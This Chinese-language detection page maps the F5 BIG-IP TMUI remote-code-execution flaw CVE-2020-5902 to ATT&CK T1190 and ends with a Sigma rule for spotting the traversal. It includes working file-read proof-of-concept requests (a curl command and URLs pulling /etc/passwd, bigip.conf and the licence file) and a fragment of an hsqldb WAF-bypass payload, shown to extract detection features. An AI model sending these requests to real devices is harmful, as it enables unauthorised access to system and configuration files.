跳转至

T1190-CVE-2020-5902-F5_BIG-IP-远程代码执行

来自ATT&CK的描述

使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。

如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。

对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。

测试案例

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

漏洞影响范围:

11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x

检测日志

HTTP.log

测试复现

漏洞利用建议参考:

F5 BIG-IP 远程代码执行漏洞(CVE-2020-5902) 漏洞利用

https://blog.csdn.net/wuyou1995/article/details/107170186/

cve-2020-5902 RCE的payload以及绕过方式

https://www.cnblogs.com/potatsoSec/p/13263806.html

测试留痕

暂无实测,故无留痕。直接引用漏洞利用建议参考中的案例数据进行特征提取。

文件读取POC

curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

通过java反序列化绕过waf的payload

String dburl = "jdbc:hsqldb:https://" + server +
                               ":443/tmui/login.jsp/..%3b/hsqldb/"; #截取部分内容

检测规则/思路

sigma规则

title: CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞
status: experimental
references:
    - https://blog.csdn.net/wuyou1995/article/details/107170186/
    - https://www.cnblogs.com/potatsoSec/p/13263806.html
author: Florian Roth
translator: 12306Bro
date: 2020/07/05
logsource:
    category: webserver
detection:
    selection_base:
        c-uri|contains: 
            - '/tmui/'
            - '/hsqldb'
    selection_traversal:
        c-uri|contains:
            - '..;/'
            - '.jsp/..'
    condition: selection_base and selection_traversal
fields:
    - c-ip
    - c-dns
falsepositives:
    - Unknown
tags:
    - attack.initial_access
    - attack.t1190
level: critical

建议

建议使用HTTP流量+安全设备进行检测分析判断攻击是否成功。

参考推荐

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/

F5 BIG-IP 远程代码执行漏洞(CVE-2020-5902) 漏洞利用

https://blog.csdn.net/wuyou1995/article/details/107170186/

cve-2020-5902 RCE的payload以及绕过方式

https://www.cnblogs.com/potatsoSec/p/13263806.html